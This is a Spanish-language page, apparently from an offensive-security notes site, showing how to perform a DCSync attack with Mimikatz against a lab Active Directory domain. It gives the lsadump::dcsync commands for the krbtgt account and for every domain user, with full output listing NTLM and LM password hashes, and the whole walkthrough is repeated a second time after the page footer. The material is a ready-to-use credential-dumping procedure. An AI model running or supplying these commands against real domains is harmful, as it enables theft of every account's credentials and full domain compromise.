Utilizando Mimikatz

Para realizar un DCSync podriamos realizarlo para extraer la informacion de un usuario en especifico o de todos los usuarios:

Para un usuario especifico:

PS C:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /user:krbtgt
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/19/2022 11:34:18 PM
Object Security ID   : S-1-5-21-1861162130-2580302541-221646211-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b44daa015f201fa31126895ebbcbbcab
    ntlm- 0: b44daa015f201fa31126895ebbcbbcab
    lm  - 0: 216e51b46d2f3117bfb04f5b1aeef460

Para exfiltrar todos los usuarios del dominio:

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /all /csv
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] Exporting domain 'spartancybersec.corp'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1116    Suspicious-PC$  d566c257631be77cde24694488ef337d        4096
502     krbtgt  b44daa015f201fa31126895ebbcbbcab        514
500     Administrator   c90fb8ae170b856da331fa40d5c11769        512
1009    FIRST-DC$       9e24232fd09fa4eb1fdf798597550a40        532480
1008    admin   64fbae31cc352fc26af97cbdef151e03        66048
1126    clearpass.user  64fbae31cc352fc26af97cbdef151e03        66048
1120    compwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1115    constrained.user        64fbae31cc352fc26af97cbdef151e03        66048
1113    dnsadmin.user   64fbae31cc352fc26af97cbdef151e03        66048
1121    gpowrite.user   64fbae31cc352fc26af97cbdef151e03        66048
1123    groupwrite.user 64fbae31cc352fc26af97cbdef151e03        66048
1122    lapsread.user   64fbae31cc352fc26af97cbdef151e03        66048
1125    readgmsa.user   64fbae31cc352fc26af97cbdef151e03        66048
1112    regular.user    64fbae31cc352fc26af97cbdef151e03        66048
1127    roast.user      64fbae31cc352fc26af97cbdef151e03        66048
1114    unconstrained.user      64fbae31cc352fc26af97cbdef151e03        590336
1118    userall.user    64fbae31cc352fc26af97cbdef151e03        66048
1117    userwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1124    writedacldc.user        64fbae31cc352fc26af97cbdef151e03        66048
1129    USER-SERVER$    dadef894e564c991a5a5714e0a7efc67        4096
1131    WEBSERVER$      449c5f226aff8a2af42ac07ebaf901cb        4096
1130    adminwebserver  64fbae31cc352fc26af97cbdef151e03        66048
1128    asrep.user      64fbae31cc352fc26af97cbdef151e03        4260352
1119    VIKINGSCYBERSEC$        a9e60b71ecaab835b49ec6a56ca99af5        2080

AnteriorUtilizando CrackMapExec SiguienteUtilizando Impacket-secretsdump

Última actualización hace 8 meses

¿Te fue útil?

Para un usuario especifico:

PS C:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /user:krbtgt
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/19/2022 11:34:18 PM
Object Security ID   : S-1-5-21-1861162130-2580302541-221646211-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b44daa015f201fa31126895ebbcbbcab
    ntlm- 0: b44daa015f201fa31126895ebbcbbcab
    lm  - 0: 216e51b46d2f3117bfb04f5b1aeef460

Para exfiltrar todos los usuarios del dominio:

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /all /csv
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] Exporting domain 'spartancybersec.corp'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1116    Suspicious-PC$  d566c257631be77cde24694488ef337d        4096
502     krbtgt  b44daa015f201fa31126895ebbcbbcab        514
500     Administrator   c90fb8ae170b856da331fa40d5c11769        512
1009    FIRST-DC$       9e24232fd09fa4eb1fdf798597550a40        532480
1008    admin   64fbae31cc352fc26af97cbdef151e03        66048
1126    clearpass.user  64fbae31cc352fc26af97cbdef151e03        66048
1120    compwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1115    constrained.user        64fbae31cc352fc26af97cbdef151e03        66048
1113    dnsadmin.user   64fbae31cc352fc26af97cbdef151e03        66048
1121    gpowrite.user   64fbae31cc352fc26af97cbdef151e03        66048
1123    groupwrite.user 64fbae31cc352fc26af97cbdef151e03        66048
1122    lapsread.user   64fbae31cc352fc26af97cbdef151e03        66048
1125    readgmsa.user   64fbae31cc352fc26af97cbdef151e03        66048
1112    regular.user    64fbae31cc352fc26af97cbdef151e03        66048
1127    roast.user      64fbae31cc352fc26af97cbdef151e03        66048
1114    unconstrained.user      64fbae31cc352fc26af97cbdef151e03        590336
1118    userall.user    64fbae31cc352fc26af97cbdef151e03        66048
1117    userwrite.user  64fbae31cc352fc26af97cbdef151e03        66048
1124    writedacldc.user        64fbae31cc352fc26af97cbdef151e03        66048
1129    USER-SERVER$    dadef894e564c991a5a5714e0a7efc67        4096
1131    WEBSERVER$      449c5f226aff8a2af42ac07ebaf901cb        4096
1130    adminwebserver  64fbae31cc352fc26af97cbdef151e03        66048
1128    asrep.user      64fbae31cc352fc26af97cbdef151e03        4260352
1119    VIKINGSCYBERSEC$        a9e60b71ecaab835b49ec6a56ca99af5        2080